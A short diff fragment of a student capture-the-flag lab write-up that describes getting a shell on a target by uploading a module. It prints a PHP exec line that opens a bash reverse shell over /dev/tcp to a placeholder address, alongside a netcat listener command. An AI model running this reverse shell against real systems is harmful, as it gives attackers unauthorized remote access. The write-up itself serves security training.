Gustav-Magnussen/CTFTeam5/Lab05/Main.md

     exec("/bin/bash -c 'bash -i >& /dev/tcp/ip_address/portnumber 0>&1'");
 ![image](https://user-images.githubusercontent.com/70077872/167573750-8dca4946-dd94-4f2d-8923-ecbda7b62a48.png)

- At the same time, we started a port listener in a terminal window by executing the command `nc -nvlp port number.
+ At the same time, we started a port listener in a terminal window by executing the command `nc -nvlp port_number`.

 After uploading the module, enabling it and installing it, we got a shell to www-data.